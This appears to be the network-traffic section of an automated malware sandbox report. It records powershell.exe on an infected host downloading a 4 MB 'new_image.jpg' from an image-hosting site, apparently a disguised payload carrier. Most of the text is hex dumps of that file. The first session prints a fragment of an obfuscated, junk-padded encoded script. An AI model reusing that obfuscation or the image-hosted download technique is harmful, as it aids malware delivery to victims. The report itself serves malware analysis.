                                                                                        2024-04-23 05:53:23 UTC1369INData Raw: 65 61 51 42 79 44 67 54 72 65 48 44 67 54 72 65 44 67 54 72 65 59 51 42 33 44 67 54 72 65 48 67 44 67 54 72 65 4c 77 42 79 44 67 54 72 65 47 38 44 67 54 72 65 63 67 42 79 44 67 54 72 65 47 55 44 67 54 72 65 4c 77 42 74 44 67 54 72 65 47 38 44 67 54 72 65 59 77 44 67 54 72 65 75 44 67 54 72 65 48 4d 44 67 54 72 65 22 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 63 61 6c 6f 6e 64 72 6f 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 22 51 42 77 44 67 54 72 65 47 38 44 67 54 72 65 63 67 42 79 44 67 54 72 65 47 55 44 67 54 72 65 61 44 67 54 72 65 42 30 44 67 54 72 65 47 34 44 67 54 72 65 59 51 42 77 44 67 54 72 65 43 38 44 67 54 72 65 4c 77 44 67 54 72 65 36 44 67 54 72 65 48 4d 44 67 54 72 65 63 44 67 54 72 65 42 30 44 67 54 72 65 48 51 44 67 54 72 65 61
                                                                                        Data Ascii: eaQByDgTreHDgTreDgTreYQB3DgTreHgDgTreLwByDgTreG8DgTrecgByDgTreGUDgTreLwBtDgTreG8DgTreYwDgTreuDgTreHMDgTre" & matozinhos & calondro & matozinhos & "QBwDgTreG8DgTrecgByDgTreGUDgTreaDgTreB0DgTreG4DgTreYQBwDgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTrea


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.549729172.67.215.454436412C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-04-23 05:53:27 UTC124OUTGET /images/004/771/542/original/new_image.jpg?1713394820 HTTP/1.1
                                                                                        Host: uploaddeimagens.com.br
                                                                                        Connection: Keep-Alive
                                                                                        2024-04-23 05:53:27 UTC700INHTTP/1.1 200 OK
                                                                                        Date: Tue, 23 Apr 2024 05:53:27 GMT
                                                                                        Content-Type: image/jpeg
                                                                                        Content-Length: 4201093
                                                                                        Connection: close
                                                                                        Last-Modified: Wed, 17 Apr 2024 23:00:20 GMT
                                                                                        ETag: "66205484-401a85"
                                                                                        Cache-Control: max-age=2678400
                                                                                        CF-Cache-Status: HIT
                                                                                        Age: 623
                                                                                        Accept-Ranges: bytes
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rsNiz9oKOGxa38vOvjlk7%2BzcgnjVCDvAPQhW%2BTHnvEOVXLaQ6Iox6fiosGtb%2B3jbbKRvBFW5k%2BDwfSseiiHXS5Hju8O3eEUS%2BoJ3IuDKAJFoAo6cMJBFVHWfF3spI9I9J%2BNKeGCVTBv8"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 878b97e108901a13-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-04-23 05:53:27 UTC669INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                        Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                        2024-04-23 05:53:27 UTC1369INData Raw: ac c1 af d4 6f e1 95 2e 54 7a 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 a5 de
                                                                                        Data Ascii: o.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>uI^O^gy4Ap
                                                                                        2024-04-23 05:53:27 UTC1369INData Raw: f4 c5 56 48 d9 87 25 56 1e 41 ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4 11
                                                                                        Data Ascii: VH%VAy2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg
                                                                                        2024-04-23 05:53:27 UTC1369INData Raw: c9 2d 5c 6d c4 1f 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28
                                                                                        Data Ascii: -\mTr7qLz2iO7ZsiA%nGR?{O|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a(
                                                                                        2024-04-23 05:53:27 UTC1369INData Raw: 07 8b 3e f8 03 32 f9 ca c8 48 50 a3 af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9
                                                                                        Data Ascii: >2HPscb.F$e%*z*IMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW|Rm\LITUTVlD#v aT@v@b
                                                                                        2024-04-23 05:53:27 UTC1369INData Raw: 3a cd 34 1e 1a 3c a4 52 cc a5 76 d0 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 a1 6d
                                                                                        Data Ascii: :4<RvOKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>im
                                                                                        2024-04-23 05:53:27 UTC1369INData Raw: b4 72 3a 06 01 54 90 2e fa 66 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd a9
                                                                                        Data Ascii: r:T.f{b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk}
                                                                                        2024-04-23 05:53:27 UTC1369INData Raw: 31 dd 47 db 1d 13 85 1f 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 e3
                                                                                        Data Ascii: 1Gvu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8r
                                                                                        2024-04-23 05:53:27 UTC1369INData Raw: 9f 6c 57 5f 34 2f a5 6d 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83
                                                                                        Data Ascii: lW_4/mnq#O**!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};|1zwr80/`vI<R@i*$!@
                                                                                        2024-04-23 05:53:27 UTC1369INData Raw: de f9 ce 8b 40 74 f1 23 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53
                                                                                        Data Ascii: @t#K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU|JG4]Crj4825A=G=pG/|v>*M)phJeenBx}66Ov$EZX\:2A hCS


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.549731172.67.215.454436412C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-04-23 05:53:28 UTC100OUTGET /images/004/771/542/original/new_image.jpg?1713394820 HTTP/1.1
                                                                                        Host: uploaddeimagens.com.br
                                                                                        2024-04-23 05:53:28 UTC698INHTTP/1.1 200 OK
                                                                                        Date: Tue, 23 Apr 2024 05:53:28 GMT
                                                                                        Content-Type: image/jpeg
                                                                                        Content-Length: 4201093
                                                                                        Connection: close
                                                                                        Last-Modified: Wed, 17 Apr 2024 23:00:20 GMT
                                                                                        ETag: "66205484-401a85"
                                                                                        Cache-Control: max-age=2678400
                                                                                        CF-Cache-Status: HIT
                                                                                        Age: 624
                                                                                        Accept-Ranges: bytes
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AqxYiywktaZ3qtM5iAw8SEpCtJoPHqnX0reTncLYkH8roZQ2MzU8fFvlFR9Q1melIVAl2gfeV%2FHng2rdseElplUmjvI0n24SIEiHfAw%2BSrWqBPrr%2F7ZakVR0yTFn%2Ffox2aoi2%2BqfPAEC"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 878b97eadb6241d5-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-04-23 05:53:28 UTC671INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                        Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                        2024-04-23 05:53:28 UTC1369INData Raw: af d4 6f e1 95 2e 54 7a 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 a5 de dc d9
                                                                                        Data Ascii: o.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>uI^O^gy4Ap
                                                                                        2024-04-23 05:53:28 UTC1369INData Raw: 56 48 d9 87 25 56 1e 41 ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4 11 24 6a
                                                                                        Data Ascii: VH%VAy2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$j
                                                                                        2024-04-23 05:53:28 UTC1369INData Raw: 5c 6d c4 1f 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 01 df
                                                                                        Data Ascii: \mTr7qLz2iO7ZsiA%nGR?{O|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a(
                                                                                        2024-04-23 05:53:28 UTC1369INData Raw: 3e f8 03 32 f9 ca c8 48 50 a3 af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84
                                                                                        Data Ascii: >2HPscb.F$e%*z*IMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW|Rm\LITUTVlD#v aT@v@b^
                                                                                        2024-04-23 05:53:28 UTC1369INData Raw: 34 1e 1a 3c a4 52 cc a5 76 d0 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 a1 6d c1 e6
                                                                                        Data Ascii: 4<RvOKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>im
                                                                                        2024-04-23 05:53:28 UTC1369INData Raw: 3a 06 01 54 90 2e fa 66 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd a9 d3 2c
